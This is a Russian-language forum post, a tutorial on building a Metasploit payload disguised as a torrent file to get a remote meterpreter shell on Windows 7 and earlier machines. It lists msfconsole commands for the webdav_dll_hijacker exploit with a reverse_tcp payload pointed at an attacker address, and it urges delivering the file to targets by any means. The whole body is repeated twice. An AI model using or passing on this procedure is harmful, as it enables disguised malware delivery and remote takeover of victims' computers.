- Статус
- Оффлайн
- Регистрация
- 9 Авг 2016
- Сообщения
- 1,426
- Реакции
- 1,047
Всем привет! Хочу рассказать как получить сессию(нет не в универе) meterpreter с помощью вируса которого мы создадим и "спрячем" в торрент фаил.
С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, можно использовать любые окна до 7. На 8/10 не работает. Частичная работоспособность на 8.1.(Зависит от версии)
Итак, запустив Metasploit, вводим следующее:
> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)
> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)
> set lhost 192.168.0.104 (Определим адрес атакующего хоста)
> set extensions torrent (Выберем тип расширения файла)
> exploit (Запустим работу фреймворка)
Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.
Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка
В консоли атакующего хоста видим сигнализационные сообщения:
Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл
После его запуска, откроется активная сессия meterpreter:
Проверим ее:
В опциях эксплойта, можно изменить директорию и название полезной нагрузки:
На этом пожалуй, все, спасибо за внимание.
С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, можно использовать любые окна до 7. На 8/10 не работает. Частичная работоспособность на 8.1.(Зависит от версии)
Итак, запустив Metasploit, вводим следующее:
> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)
> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)
> set lhost 192.168.0.104 (Определим адрес атакующего хоста)
> set extensions torrent (Выберем тип расширения файла)
> exploit (Запустим работу фреймворка)
Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.
Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка
В консоли атакующего хоста видим сигнализационные сообщения:
Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл
После его запуска, откроется активная сессия meterpreter:
Проверим ее:
В опциях эксплойта, можно изменить директорию и название полезной нагрузки:
На этом пожалуй, все, спасибо за внимание.
